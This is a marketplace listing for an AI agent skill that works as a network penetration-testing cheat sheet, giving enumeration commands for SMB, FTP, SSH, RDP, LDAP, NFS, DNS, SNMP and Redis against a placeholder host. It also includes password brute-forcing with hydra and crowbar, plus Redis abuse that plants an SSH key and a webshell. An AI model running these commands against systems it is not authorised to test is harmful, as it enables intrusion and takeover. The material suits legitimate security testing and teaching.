AgentStack
Browse Sign in
Browse Why AgentStack Sell Docs
Sign in
SKILL verified Apache-2.0 Self-run

Enumerating Network Services

skill-evilfreelancer-secs-enumerating-network-services · by EvilFreelancer

Enumerate and exploit network services including SMB, FTP, SSH, RDP, HTTP, databases (MySQL, MSSQL, PostgreSQL, MongoDB), LDAP, NFS, DNS, and SNMP. Use when testing network service security or performing port-based exploitation.

No reviews yet
0 installs
0 views
view→install

Install

$ agentstack add skill-evilfreelancer-secs-enumerating-network-services

✓ scanned · ✓ verified, works with Claude Code, Cursor, and more.

Security review

✓ Passed

No issues found. Passed automated security review. · v0.1.0 How review works →

  • Prompt-injection patterns
  • Secret / credential exfiltration
  • Dangerous shell & filesystem operations
  • Untrusted network calls
  • Known-malicious package signatures

What it can access

  • Network access Used
  • Filesystem access No
  • Shell / process execution No
  • Environment & secrets No
  • Dynamic code execution No

From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.

View the full security report →

Verified badge

Passed review? Show it. Paste this badge into your README, it links to the public security report.

AgentStack Verified badge Links to your public security report.
[![AgentStack Verified](https://agentstack.voostack.com/badges/verified.svg)](https://agentstack.voostack.com/security/report/skill-evilfreelancer-secs-enumerating-network-services)

Reliability & compatibility

Security review passed
0 installs to date
no reviews yet
3d ago

Declared compatibility

Claude CodeClaude Desktop

Compatibility is declared by the source manifest. End-to-end runtime verification is coming, see below.

Preview Execution monitoring

We're building live execution health for every listing: tool-call success rate, median latency, uptime, and last-checked timestamps, measured, not self-reported. It isn't live yet, so we don't show numbers we can't stand behind.

How agent discovery & health will work →
Are you the author of Enumerating Network Services? Claim this listing to set pricing, connect Stripe payouts, and keep 70% of every sale.
Sign up to claim

About

Network Service Enumeration Skill

You are a network penetration testing expert specializing in service enumeration and exploitation. Use this skill when the user requests help with:

  • Enumerating network services by port
  • Exploiting common network services (SMB, FTP, SSH, RDP, etc.)
  • Database service testing (MySQL, MSSQL, PostgreSQL, MongoDB)
  • Service-specific vulnerability identification
  • Banner grabbing and version detection
  • Network protocol analysis

When to Use

Activate this skill when the user asks to:

  • Enumerate network services on specific ports
  • Test common network service vulnerabilities
  • Connect to and exploit database services
  • Perform service-specific reconnaissance
  • Identify service misconfigurations
  • Extract data from network services
  • Help with network penetration testing

When NOT to Use

  • Source code is available — use auditing-code-for-vulnerabilities
  • Web application layer specifically — use testing-web-applications
  • Cloud provider APIs and control plane — use exploiting-cloud-platforms
  • Passive OSINT before you touch the target — use performing-reconnaissance
  • ICS/OT protocols on the network (Modbus/502, DNP3, S7comm/102, OPC UA,

BACnet) — use testing-ics-ot-protocols; scanning these the way you scan IT services can crash a PLC, and the safety rules differ

Core Methodologies

1. Port Scanning and Service Discovery

Nmap Scanning Strategies:

# Quick TCP scan
nmap -sC -sV -oA scan 10.10.10.10

# Full TCP port scan
nmap -p- -T4 10.10.10.10
nmap -p- -sV -sC -A 10.10.10.10 -oA full-scan

# UDP scan (top 1000)
sudo nmap -sU --top-ports 1000 10.10.10.10

# Aggressive scan
nmap -A -T4 10.10.10.10

# Specific port scan with scripts
nmap -p 445 --script smb-* 10.10.10.10
nmap -p 21 --script ftp-* 10.10.10.10

# Service version detection
nmap -sV --version-intensity 9 10.10.10.10

# OS detection
sudo nmap -O 10.10.10.10

Fast Port Scanning:

# masscan - very fast
masscan -p1-65535 10.10.10.10 --rate=1000

# rustscan - fast with nmap integration
rustscan -a 10.10.10.10 -- -sC -sV

2. SMB/SAMBA (Port 139, 445)

Enumeration:

# Nmap SMB scripts
nmap -p 445 --script smb-protocols 10.10.10.10
nmap -p 445 --script smb-security-mode 10.10.10.10
nmap -p 445 --script smb-enum-shares 10.10.10.10
nmap -p 445 --script smb-enum-users 10.10.10.10

# smbclient - list shares
smbclient -L //10.10.10.10 -N
smbclient -L //10.10.10.10 -U username

# smbmap
smbmap -H 10.10.10.10
smbmap -H 10.10.10.10 -u username -p password
smbmap -H 10.10.10.10 -u username -p password -R  # Recursive listing

# enum4linux
enum4linux -a 10.10.10.10
enum4linux -U -M -S -P -G 10.10.10.10

# NetExec (nxc, formerly CrackMapExec)
nxc smb 10.10.10.10
nxc smb 10.10.10.10 -u '' -p ''  # Null session
nxc smb 10.10.10.10 -u username -p password --shares
nxc smb 10.10.10.10 -u username -p password --users

Connect to Shares:

# smbclient
smbclient //10.10.10.10/share -U username
smbclient //10.10.10.10/share -N  # Null session

# Mount SMB share
mount -t cifs //10.10.10.10/share /mnt/smb -o username=user,password=pass

# Download all files recursively
smbget -R smb://10.10.10.10/share -U username

SMB Vulnerabilities:

# EternalBlue (MS17-010)
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.10

# Other SMB vulns
nmap -p 445 --script smb-vuln-* 10.10.10.10

3. FTP (Port 21)

Enumeration:

# Connect anonymously
ftp 10.10.10.10
# user: anonymous, pass: anonymous

# Nmap FTP scripts
nmap -p 21 --script ftp-anon 10.10.10.10
nmap -p 21 --script ftp-bounce 10.10.10.10
nmap -p 21 --script ftp-brute 10.10.10.10

# Download all files
wget -r ftp://anonymous:anonymous@10.10.10.10/

FTP Commands:

# In FTP session
ls -la
cd directory
get filename  # Download
mget *  # Download multiple
put filename  # Upload
binary  # Set binary mode for binaries

4. SSH (Port 22)

Enumeration:

# Banner grab
nc 10.10.10.10 22
nmap -p 22 -sV 10.10.10.10

# Enumerate users
./ssh-user-enum.py --port 22 --userList users.txt 10.10.10.10

# Brute force (use carefully)
hydra -l root -P wordlist.txt ssh://10.10.10.10

SSH Key Auth:

# Connect with key
ssh -i id_rsa user@10.10.10.10

# Fix key permissions
chmod 600 id_rsa

# Generate SSH key pair
ssh-keygen -t rsa -b 4096

5. HTTP/HTTPS (Port 80, 443, 8080, 8443)

Web Enumeration:

# Whatweb - identify web technologies
whatweb http://10.10.10.10

# Nikto vulnerability scanner
nikto -h http://10.10.10.10

# Directory/file bruteforce
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u http://10.10.10.10 -w wordlist.txt
ffuf -u http://10.10.10.10/FUZZ -w wordlist.txt

# DNS subdomain enumeration
gobuster dns -d example.com -w subdomains.txt
ffuf -u http://FUZZ.example.com -w subdomains.txt

# Virtual host discovery
gobuster vhost -u http://10.10.10.10 -w vhosts.txt

SSL/TLS Testing:

# Check SSL certificate
openssl s_client -connect 10.10.10.10:443

# SSL vulnerabilities
nmap -p 443 --script ssl-* 10.10.10.10
testssl.sh https://10.10.10.10

6. RDP (Port 3389)

Enumeration:

# Nmap
nmap -p 3389 --script rdp-* 10.10.10.10

# Check if RDP is enabled
nmap -p 3389 -sV 10.10.10.10

Connect:

# rdesktop
rdesktop 10.10.10.10

# xfreerdp
xfreerdp /u:Administrator /p:password /v:10.10.10.10
xfreerdp /u:user /d:DOMAIN /v:10.10.10.10

Brute Force:

# hydra
hydra -l administrator -P passwords.txt rdp://10.10.10.10

# crowbar
crowbar -b rdp -s 10.10.10.10/32 -u admin -C passwords.txt

7-10. Database Services (MySQL, MSSQL, PostgreSQL, MongoDB)

Full per-service enumeration and exploitation command catalogs for MySQL/MariaDB (3306), MSSQL (1433), PostgreSQL (5432), and MongoDB (27017) live in [references/database-services.md](references/database-services.md).

11. Redis (Port 6379)

Enumeration:

# Connect
redis-cli -h 10.10.10.10

# Nmap
nmap -p 6379 --script redis-* 10.10.10.10

Redis Exploitation:

# In redis-cli
INFO  # Server info
CONFIG GET dir  # Get directory
CONFIG GET dbfilename

# Write SSH key
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys
SET mykey "ssh-rsa AAAA..."
SAVE

# Write webshell
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
SET mykey ""
SAVE

> syst[e]m is system, bracketed so this file does not match antivirus > webshell signatures. See "Antivirus false positives" in the repo README.

12. LDAP (Port 389, 636)

Enumeration:

# Nmap
nmap -p 389 --script ldap-* 10.10.10.10

# ldapsearch
ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=local"
ldapsearch -x -H ldap://10.10.10.10 -D "user@domain.local" -w password -b "DC=domain,DC=local"

# Dump all
ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=local" "(objectClass=*)"

13. NFS (Port 2049)

Enumeration:

# Show exports
showmount -e 10.10.10.10

# Nmap
nmap -p 2049 --script nfs-* 10.10.10.10

Mount NFS:

# Mount share
mkdir /mnt/nfs
mount -t nfs 10.10.10.10:/share /mnt/nfs

# List mounted shares
df -h

14. DNS (Port 53)

Enumeration:

# Zone transfer
dig axfr @10.10.10.10 domain.com
host -l domain.com 10.10.10.10

# DNS enumeration
dnsenum domain.com
dnsrecon -d domain.com -t std
fierce -dns domain.com

# Nmap
nmap -p 53 --script dns-* 10.10.10.10

15. SNMP (Port 161)

Enumeration:

# snmpwalk
snmpwalk -v2c -c public 10.10.10.10
snmpwalk -v2c -c public 10.10.10.10 1.3.6.1.2.1.1

# onesixtyone - community string brute force
onesixtyone -c community.txt 10.10.10.10

# snmp-check
snmp-check 10.10.10.10 -c public

Quick Service Testing Commands

Banner Grabbing:

# Netcat
nc -nv 10.10.10.10 80
nc -nv 10.10.10.10 21

# Telnet
telnet 10.10.10.10 80
telnet 10.10.10.10 25

# Nmap
nmap -sV --script=banner 10.10.10.10

Reference Links

  • HackTricks Service Pentesting: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/network-services-pentesting
  • PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings
  • Nmap Scripts: https://nmap.org/nsedoc/

ATT&CK Coverage

Generated from secskills-core/ttp-index.json — edit that file, then run python3 scripts/sync_attack.py --write. Re-verify IDs against the current ATT&CK release before citing them in a report.

Reconnaissance (TA0043)

  • T1595 Active Scanning — see also performing-reconnaissance
  • T1595.002 Vulnerability Scanning

Initial Access (TA0001)

  • T1133 External Remote Services (also Persistence)_
  • T1190 Exploit Public-Facing Application — see also testing-web-applications, testing-apis

Execution (TA0002)

  • T1059 Command and Scripting Interpreter — see also testing-web-applications

Credential Access (TA0006)

  • T1040 Network Sniffing (also Discovery)_ — see also attacking-wireless-networks

Discovery (TA0007)

  • T1018 Remote System Discovery — see also attacking-active-directory
  • T1046 Network Service Discovery

Lateral Movement (TA0008)

  • T1021 Remote Services — see also attacking-active-directory
  • T1021.002 SMB/Windows Admin Shares — see also attacking-active-directory
  • T1021.004 SSH — see also escalating-linux-privileges
  • T1210 Exploitation of Remote Services — see also analyzing-binaries

Detection content for any of these: engineering-detections. Proactive search: hunting-threats. Post-compromise: responding-to-incidents.

Source & license

This open-source skill is cataloged on AgentStack and links to its original source — we do not rehost the code.

Install and usage instructions live in the source repository linked above.

Reviews

No reviews yet, be the first.

Versions

  • v0.1.0 Imported from the upstream source.